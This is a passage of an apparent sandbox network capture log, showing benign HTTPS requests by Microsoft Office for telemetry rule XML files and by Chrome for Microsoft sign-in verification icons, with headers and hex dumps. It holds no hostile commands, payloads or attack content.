                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.64978013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:06 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:06 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:06 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 486
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                        ETag: "0x8DC582B92FCB436"
                                                        x-ms-request-id: e1bc049e-701e-003e-11a5-3479b3000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152706Z-15869dbbcc6tjwwhhC1DFWn22800000009a00000000028ms
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:06 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        57192.168.2.64977913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:06 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:06 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:06 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 427
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                        ETag: "0x8DC582BA909FA21"
                                                        x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152706Z-16547b76f7fx6rhxhC1DFW76kg0000000fq000000000n82b
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        58192.168.2.64978113.107.246.454436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:06 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                        Host: aadcdn.msauth.net
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:06 UTC806INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:06 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 2407
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                        ETag: 0x8DB5C3F499A9B99
                                                        x-ms-request-id: 8f34a892-a01e-0010-2ca4-2c063e000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241112T152706Z-16547b76f7fdtmzhhC1DFW6zhc00000004q000000000cmzb
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:06 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                        Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        59192.168.2.64978213.107.246.454436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:06 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                        Host: aadcdn.msauth.net
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:06 UTC805INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:06 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 199
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                        ETag: 0x8DB5C3F49C21D98
                                                        x-ms-request-id: c97bf5e1-801e-0038-538a-2c6796000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241112T152706Z-16547b76f7f9bs6dhC1DFWt3rg0000000fq000000000mafs
                                                        x-fd-int-roxy-purgeid: 4554691
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:06 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                        Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.64977813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:06 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:07 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:06 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 472
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                        ETag: "0x8DC582B9D43097E"
                                                        x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152706Z-16547b76f7frbg6bhC1DFWr5400000000fs000000000amnm
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:07 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.649783152.199.21.1754436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:07 UTC424OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                        Host: aadcdn.msftauth.net
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:07 UTC738INHTTP/1.1 200 OK
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Age: 20080399
                                                        Cache-Control: public, max-age=31536000
                                                        Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                        Content-Type: image/svg+xml
                                                        Date: Tue, 12 Nov 2024 15:27:07 GMT
                                                        Etag: 0x8DB5C3F4AC59B47
                                                        Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                        Server: ECAcc (lhc/78BB)
                                                        Vary: Accept-Encoding
                                                        X-Cache: HIT
                                                        x-ms-blob-type: BlockBlob
                                                        x-ms-lease-status: unlocked
                                                        x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                        x-ms-version: 2009-09-19
                                                        Content-Length: 1636
                                                        Connection: close
                                                        2024-11-12 15:27:07 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                        Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        62192.168.2.64978613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:07 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:07 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:07 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 423
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                        ETag: "0x8DC582BB7564CE8"
                                                        x-ms-request-id: 84619de9-001e-0017-36a2-340c3c000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152707Z-15869dbbcc65c582hC1DFWgpv400000009q0000000007ma1
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:07 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        63192.168.2.64978513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:07 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:07 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:07 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 478
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                        ETag: "0x8DC582B9B233827"
                                                        x-ms-request-id: de083b16-101e-0079-14f1-2c5913000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152707Z-16547b76f7f8dwtrhC1DFWd1zn0000000fug00000000mvkx
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:07 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        64192.168.2.64978713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:07 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:07 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:07 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 404
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                        ETag: "0x8DC582B95C61A3C"
                                                        x-ms-request-id: 74ac5a2e-001e-0066-5da0-34561e000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152707Z-15869dbbcc6ss7fxhC1DFWq6vs0000000970000000009s95
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:07 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        65192.168.2.64978813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:07 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:07 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:07 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 468
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                        ETag: "0x8DC582BB046B576"
                                                        x-ms-request-id: 9487b432-d01e-0082-4aa8-34e489000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152707Z-17df447cdb54ntx4hC1DFW2k400000000cp0000000000vpg
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:07 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        66192.168.2.64979013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:07 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:08 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:07 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 400
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                        ETag: "0x8DC582BB2D62837"
                                                        x-ms-request-id: 510f0f50-601e-0050-05a5-342c9c000000
                                                        x-ms-version: 2018-03-28
